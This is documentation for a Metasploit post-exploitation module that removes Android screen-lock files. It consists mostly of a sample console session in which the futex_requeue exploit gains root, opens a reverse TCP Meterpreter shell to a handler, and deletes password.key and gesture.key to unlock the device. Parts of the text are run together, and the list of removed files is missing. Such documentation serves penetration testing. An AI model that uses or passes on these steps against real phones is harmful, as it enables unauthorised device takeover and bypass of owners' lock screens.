documentation/modules/post/android/manage/remove_lock_root.md
This module removes the screen lock data files to remove the unlock mechanism. If the device still has a lock, the password will be blank.
The file which are removed:
shell or root access on an Android deviceuse post/android/manage/remove_lock_rootset session [session]runUtilizing futex_requeue to get root access.
msf exploit(android/local/futex_requeue) > run
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/cbvzt
[*] Loaded library /data/data/com.metasploit.stage/files/cbvzt, deleting
[*] Waiting 300 seconds for payload
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 4 opened (111.111.1.111:4444 -> 222.222.2.222:58577) at 2019-10-22 16:04:31 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > background
[*] Backgrounding session 4...
msf exploit(android/local/futex_requeue) > use post/android/manage/remove_lock_root
msf post(android/manage/remove_lock_root) > set session 4
session => 4
msf post(android/manage/remove_lock_root) > run
[!] SESSION may not be compatible with this module.
[*] Removing /data/system/password.key
[*] Removing /data/system/gesture.key
[*] Device should be unlocked or no longer require a pin
[*] Post module execution completed